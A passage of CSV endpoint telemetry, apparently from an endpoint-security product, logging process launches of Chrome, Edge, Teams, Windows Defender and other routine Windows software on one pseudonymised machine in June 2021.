01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+807,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:51:48.804079800+00:00,6280,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4548 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:51:49.379585200+00:00,2021-06-23 02:53:01.032267200+00:00,8307d3c1-ab58-451c-a86a-b13415d3b4f5,computerpii_0a470890c60768167990033d701e7bd881398861,159999,False,10.7740.19041.1052,False,11540474045171833,,11540474045172845,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+808,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:51:58.796142+00:00,17700,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6784 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:51:59.456989700+00:00,2021-06-23 02:53:01.033035500+00:00,f0770ac1-f870-45fb-b950-c1800335daf6,computerpii_0a470890c60768167990033d701e7bd881398861,160008,False,10.7740.19041.1052,False,11540474045171838,,11540474045172849,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+809,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:38:53.996244700+00:00,19136,MusNotification.exe,MusNotification.exe,PortableExecutable,2021-06-09 01:20:44.600960900+00:00,C:\Windows\System32\MusNotification.exe,689664,241d37875fe58198dc42bf626277ad38,363456023a0baf3b2339a3664c803fc4b961a46995fd20309b81204a6eef98bd,fc7109764b5a7e2ccd91a2089d1c4a10b4978a38,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:38:54.044132200+00:00,2021-06-25 00:40:57.002295700+00:00,af0a128a-e721-4b0f-9b0f-e6045762f13a,computerpii_0a470890c60768167990033d701e7bd881398861,180731,False,10.7740.19041.1052,False,11540474045136925,,11540474045178132,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,MusNotificationBroker,MusNotification.exe,MusNotificationBroker
+810,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:38:59.660215600+00:00,13516,consent.exe,consent.exe 3388 452 000001C181D2EBE0,PortableExecutable,2021-02-17 04:35:10.855703500+00:00,C:\Windows\System32\consent.exe,166216,6646631ce4ad7128762352da81f3b030,56b2d516376328129132b815e22379ae8e7176825f059c9374a33cc844482e64,1095bd4b63360fc2968d75622aa745e5523428ab,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:47:25.157136200+00:00,3388,svchost.exe,svchost.exe -k netsvcs -p -s Appinfo,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:38:59.774419300+00:00,2021-06-25 00:40:57.012442300+00:00,14d6c30e-879b-4e7a-82f8-9859d0c85681,computerpii_0a470890c60768167990033d701e7bd881398861,180946,False,10.7740.19041.1052,False,11540474045137067,,11540474045178158,2021-06-10 00:47:25.157136200+00:00,3388,2021-06-10 00:47:25.157136200+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,3388,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:47:25.530432200+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,consent,consent.exe,Consent UI for administrative applications
+811,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:00.068282600+00:00,15164,explorer.exe,Explorer.EXE,False,2021-06-25 00:38:59.791718800+00:00,20356,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:22.465142700+00:00,2021-06-25 00:40:57.019021500+00:00,79d55ae7-b4af-4380-851a-2cea53487437,computerpii_0a470890c60768167990033d701e7bd881398861,181138,False,10.7740.19041.1052,False,11540474045178163,,11540474045178212,2021-06-25 00:39:00.068282600+00:00,15164,2021-06-25 00:39:00.068282600+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,15164,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-25 00:39:00.076466400+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,20481.0,1.0,3073.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+812,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:22.411641700+00:00,20252,msedge.exe,"""msedge.exe"" --type=crashpad-handler ""--user-data-dir=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data"" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler ""--database=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data\Crashpad"" ""--metrics-dir=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data"" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=91.0.4472.114 ""--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"" --annotation=plat=Win64 ""--annotation=prod=Microsoft Edge"" --annotation=ver=91.0.864.59 --initial-client-data=0x78,0x80,0x118,0xf4,0x11c,0x7ffbde7a06f8,0x7ffbde7a0708,0x7ffbde7a0718",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278240,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:22.477576700+00:00,2021-06-25 00:40:57.019054800+00:00,9371ab5e-b8fa-40b3-8462-bfe3b938b995,computerpii_0a470890c60768167990033d701e7bd881398861,181139,False,10.7740.19041.1052,False,11540474045178212,,11540474045178213,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,256.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+813,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:39:22.930630900+00:00,17592,AdobeCollabSync.exe,"""AdobeCollabSync.exe""  --type=collab-renderer --proc=15292",PortableExecutable,2021-05-28 05:59:00+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,5549280,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.820318500+00:00,15292,AdobeCollabSync.exe,"""AdobeCollabSync.exe"" ",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:39:22.964856900+00:00,2021-06-25 00:40:57.019254700+00:00,a84bf823-0dcb-449e-aba2-ba5c87323b16,computerpii_0a470890c60768167990033d701e7bd881398861,181145,False,10.7740.19041.1052,False,11540474045178216,,11540474045178217,2021-06-25 00:39:22.820318500+00:00,15292,2021-06-25 00:39:22.820318500+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,15292,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5549280,2021-05-28 03:22:03+00:00,2021-05-28 05:59:00+00:00,2021-06-25 00:39:22.829754+00:00,2021-05-28 05:59:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+814,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 07:26:14.501986100+00:00,5820,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey C07084A7-C4EC-63FA-6EBD-DD3AB1741920 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:26:15.188865500+00:00,2021-06-24 07:28:09.524118700+00:00,6a236500-0e30-4525-9e01-5275dbcd3b5d,computerpii_0a470890c60768167990033d701e7bd881398861,177029,False,10.7740.19041.1052,False,11540474045145394,,11540474045177107,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+815,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:01:56.333694700+00:00,19992,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320856_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320856 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:01:56.525969100+00:00,2021-06-25 02:02:51.951471500+00:00,aca50417-9366-4253-8046-b62d3d26a670,computerpii_0a470890c60768167990033d701e7bd881398861,184756,False,10.7740.19041.1052,False,11540474045144190,,11540474045178941,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+816,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:19:29.721699+00:00,9980,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:19:29.760151400+00:00,2021-06-24 11:20:25.737990600+00:00,f736face-c9c1-47e4-9021-f5de9e05fddc,computerpii_0a470890c60768167990033d701e7bd881398861,180109,False,10.7740.19041.1052,False,11540474045177893,,11540474045178014,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
